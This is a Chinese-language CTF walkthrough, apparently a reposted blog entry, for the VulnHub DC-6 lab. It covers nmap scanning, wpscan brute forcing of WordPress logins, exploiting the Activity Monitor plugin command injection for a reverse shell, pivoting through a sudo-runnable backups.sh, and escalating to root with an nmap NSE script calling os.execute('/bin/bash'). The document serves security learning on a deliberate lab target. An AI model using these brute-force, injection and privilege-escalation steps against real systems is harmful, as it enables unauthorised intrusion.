【CyberSecurityLearning 75】DC系列之DC-6渗透测试(WordPress)
目錄
DC-6靶機滲透測試
1、信息收集
1.1 發(fā)現(xiàn)DC-6的IP地址
1.2 掃描開放端口
1.3 訪問web網(wǎng)頁(添加本地DNS解析)
1.4 Wpscan掃描站點(用戶名)
2、WEB滲透
2.1 爆破WordPress站點用戶名和密碼
2.2 爆破后臺路徑
2.3、activity monitor漏洞利用
2.4? 進入mark的家目錄
2.5、反彈jens用戶的shell
3、通過nmap提權(quán)
?
DC-6靶機滲透測試
0x00實驗環(huán)境
靶機:DC-6,MAC地址:00:0C:29:85:9D:FD(192.168.3.190)
測試機:Kali,IP地址:192.168.3.188
1、信息收集
1.1 發(fā)現(xiàn)DC-6的IP地址
利用DC-6的MAC地址找到IP
命令:nmap -sP 192.168.3.1/24 -oN nmap.sP
發(fā)現(xiàn)DC-6的IP為192.168.3.190
1.2 掃描開放端口
nmap -A 192.168.3.190 -p 1-65535 -oN nmap.A
發(fā)現(xiàn)開放了22端口和80端口
以及:http-title: Did not follow redirect to http://wordy/??? 訪問ip后會重定向到http://wordy/
1.3 訪問web網(wǎng)頁(添加本地DNS解析)
本機訪問192.168.3.190,發(fā)現(xiàn)網(wǎng)頁打不開,是因為沒有添加本地DNS解析
我們在本機C:\Windows\System32\drivers\etc的hosts文件中添加
本地添加DNS解析之后,刷新后發(fā)現(xiàn)能成功訪問(我們原來輸入的是IP地址,它會自動跳轉(zhuǎn)到wordy)
發(fā)現(xiàn):
Wordy
Just another WordPress site
是一個WordPress(是國外三大開源的PHP CMS 之一)
除了本地需要修改hosts文件,那我們用kali虛擬機去訪問目標80端口的時候,我們也需要去修改一下本機的host文件
vim /etc/hosts
1.4 Wpscan掃描站點(用戶名)
wpscan --url wordy -e u?????????? 列出WordPress用戶和賬號
| u | 枚舉用戶名,默認從1-10 |
| --enumerate | -e [option(s)] ?枚舉 |
| --url | -u ?要掃描的`WordPress`站點. |
在使用wpscan之前我們要做一個工具的更新:?? wpscan --update??? 更新工具
2、WEB滲透
2.1 爆破WordPress站點用戶名和密碼
掃描后發(fā)現(xiàn)存在admin、sarah、graham、mark、jens用戶,嘗試爆破出密碼
DC-6的作者在這里也給出了密碼的提示https://www.vulnhub.com/entry/dc-6,315/
OK, this isn't really a clue as such, but more of some "we don't want to spend five years waiting for a certain process to finish" kind of advice for those who just want to get on with the job.
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt That should save you a few years. ;-)
先把admin、sarah、graham、mark、jens用戶寫在user.dic
wpscan --url wordy -U user.dic -P passwords.txt(使用wpscan爆破WordPress站點用戶名和密碼)
Username: mark,
Password: helpdesk01
2.2 爆破后臺路徑
Robots.txt 有時會寫著,在一個一般開源cms都是有固定后臺的,比如joomla后臺路徑就是administrator ,wordpress的就是wp_admin ,dedecms就是dede 常用的還有admin login manger 等等
登錄后臺:
發(fā)現(xiàn)使用了activity monitor插件
2.3、activity monitor漏洞利用
百度搜索其漏洞:http://blog.nsfocus.net/cve-2018-15877/
或者kali搜索其插件漏洞:
searchsploit active monitor
存在遠程執(zhí)行漏洞可以反彈shell 到本地
cp /usr/share/exploitdb/exploits/php/webapps/45274.html 45274.html
打開45274.html,修改如下兩處地方
python -m SimpleHTTPServer
當前目錄下開啟http 服務(wù)
本機Submit request
本地再監(jiān)聽9999,發(fā)現(xiàn)沒有反彈成功誒!
burp抓包看看:發(fā)現(xiàn)后面加管道符可以執(zhí)行代碼
可以看到漏洞說的確存在的,那么我們下一步就彈shell
我們現(xiàn)在本地監(jiān)聽一下:nc -lvvp 2333
抓包改包、放包
連接成功:
進入交互式shell
2.4? 進入mark的家目錄
- Add new user: graham - GSo7isUM1D4 - done
得到用戶graham的密碼,用ssh遠程登錄
檢查sudo權(quán)限
可以看到 “backups.sh” 不需要密碼,即可修改
利用這個sh腳本可以直接獲取到j(luò)ens的shell
2.5、反彈jens用戶的shell
sudo -l看一下
?
3、通過nmap提權(quán)
nmap提權(quán)可以參考:https://gtfobins.github.io/gtfobins/nmap/#shell
echo "os.execute('/bin/bash')" >> root.nse ? ?#將os.execute('/bin/bash')寫入到root.nse文件中
sudo nmap --script=root.nse ? ? ? ? ? ? ? ? ? ? ? ? #利用nmap插件執(zhí)行/bin/bash來獲取root權(quán)限
1、用wpscan掃描用戶名和爆破密碼
2、activity monitor命令執(zhí)行漏洞的利用
3、通過nmap插件來反彈shell
總結(jié)
以上是生活随笔為你收集整理的【CyberSecurityLearning 75】DC系列之DC-6渗透测试(WordPress)的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 【CyberSecurityLearni
- 下一篇: 我国地方大数据政策的扩散模式与转移特征研